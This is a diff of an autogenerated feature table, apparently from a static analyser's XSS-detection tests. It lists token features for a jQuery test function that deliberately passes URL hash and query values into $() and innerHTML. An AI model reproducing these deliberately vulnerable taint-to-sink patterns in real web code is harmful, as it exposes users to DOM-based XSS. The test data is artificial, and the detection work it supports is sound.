    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:22 | $(hash.substring(1)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:22 | $(hash.substring(1)) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:22 | exceptional return of $(hash.substring(1)) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:22 | exceptional return of $(hash.substring(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:22 | exceptional return of $(hash.substring(1)) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:22 | exceptional return of $(hash.substring(1)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:21:3:21:22 | exceptional return of $(hash.substring(1)) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:8 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:8 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:8 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:8 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:8 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:18 | hash.substring | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:18 | hash.substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:18 | hash.substring | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:18 | hash.substring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:18 | hash.substring | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | exceptional return of hash.substring(1) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | exceptional return of hash.substring(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | exceptional return of hash.substring(1) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | exceptional return of hash.substring(1) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | exceptional return of hash.substring(1) | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | hash.substring(1) | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | hash.substring(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | hash.substring(1) | contextFunctionInterfaces | test() | @@ -13934,6 +102738,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | hash.substring(1) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | hash.substring(1) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:21:5:21:21 | hash.substring(1) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:21:10:21:18 | substring | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:21:10:21:18 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:21:10:21:18 | substring | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:21:10:21:18 | substring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:21:10:21:18 | substring | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:21:20:21:20 | 1 | CalleeFlexibleAccessPath | hash.substring | | autogenerated/Xss/DomBasedXss/jquery.js:21:20:21:20 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:21:20:21:20 | 1 | contextFunctionInterfaces | test() | @@ -13942,6 +102751,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:21:20:21:20 | 1 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:21:20:21:20 | 1 | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:21:20:21:20 | 1 | receiverName | hash | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:26 | $(hash. ... 1, 10)) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:26 | $(hash. ... 1, 10)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:26 | $(hash. ... 1, 10)) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:26 | $(hash. ... 1, 10)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:26 | $(hash. ... 1, 10)) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:26 | exceptional return of $(hash. ... 1, 10)) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:26 | exceptional return of $(hash. ... 1, 10)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:26 | exceptional return of $(hash. ... 1, 10)) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:26 | exceptional return of $(hash. ... 1, 10)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:22:3:22:26 | exceptional return of $(hash. ... 1, 10)) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:8 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:8 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:8 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:8 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:8 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:18 | hash.substring | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:18 | hash.substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:18 | hash.substring | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:18 | hash.substring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:18 | hash.substring | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | exceptional return of hash.su ... (1, 10) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | exceptional return of hash.su ... (1, 10) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | exceptional return of hash.su ... (1, 10) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | exceptional return of hash.su ... (1, 10) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | exceptional return of hash.su ... (1, 10) | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | hash.su ... (1, 10) | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | hash.su ... (1, 10) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | hash.su ... (1, 10) | contextFunctionInterfaces | test() | @@ -13949,6 +102788,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | hash.su ... (1, 10) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | hash.su ... (1, 10) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:22:5:22:25 | hash.su ... (1, 10) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:22:10:22:18 | substring | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:22:10:22:18 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:22:10:22:18 | substring | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:22:10:22:18 | substring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:22:10:22:18 | substring | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:22:20:22:20 | 1 | CalleeFlexibleAccessPath | hash.substring | | autogenerated/Xss/DomBasedXss/jquery.js:22:20:22:20 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:22:20:22:20 | 1 | contextFunctionInterfaces | test() | @@ -13965,6 +102809,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:22:23:22:24 | 10 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:22:23:22:24 | 10 | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:22:23:22:24 | 10 | receiverName | hash | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:19 | $(hash.substr(1)) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:19 | $(hash.substr(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:19 | $(hash.substr(1)) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:19 | $(hash.substr(1)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:19 | $(hash.substr(1)) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:19 | exceptional return of $(hash.substr(1)) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:19 | exceptional return of $(hash.substr(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:19 | exceptional return of $(hash.substr(1)) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:19 | exceptional return of $(hash.substr(1)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:23:3:23:19 | exceptional return of $(hash.substr(1)) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:8 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:8 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:8 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:8 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:8 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:15 | hash.substr | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:15 | hash.substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:15 | hash.substr | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:15 | hash.substr | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:15 | hash.substr | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | exceptional return of hash.substr(1) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | exceptional return of hash.substr(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | exceptional return of hash.substr(1) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | exceptional return of hash.substr(1) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | exceptional return of hash.substr(1) | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | hash.substr(1) | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | hash.substr(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | hash.substr(1) | contextFunctionInterfaces | test() | @@ -13972,6 +102846,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | hash.substr(1) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | hash.substr(1) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:23:5:23:18 | hash.substr(1) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:23:10:23:15 | substr | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:23:10:23:15 | substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:23:10:23:15 | substr | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:23:10:23:15 | substr | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:23:10:23:15 | substr | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:23:17:23:17 | 1 | CalleeFlexibleAccessPath | hash.substr | | autogenerated/Xss/DomBasedXss/jquery.js:23:17:23:17 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:23:17:23:17 | 1 | contextFunctionInterfaces | test() | @@ -13980,6 +102859,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:23:17:23:17 | 1 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:23:17:23:17 | 1 | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:23:17:23:17 | 1 | receiverName | hash | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:18 | $(hash.slice(1)) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:18 | $(hash.slice(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:18 | $(hash.slice(1)) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:18 | $(hash.slice(1)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:18 | $(hash.slice(1)) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:18 | exceptional return of $(hash.slice(1)) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:18 | exceptional return of $(hash.slice(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:18 | exceptional return of $(hash.slice(1)) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:18 | exceptional return of $(hash.slice(1)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:24:3:24:18 | exceptional return of $(hash.slice(1)) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:8 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:8 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:8 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:8 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:8 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:14 | hash.slice | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:14 | hash.slice | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:24:5:24:14 | hash.slice | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
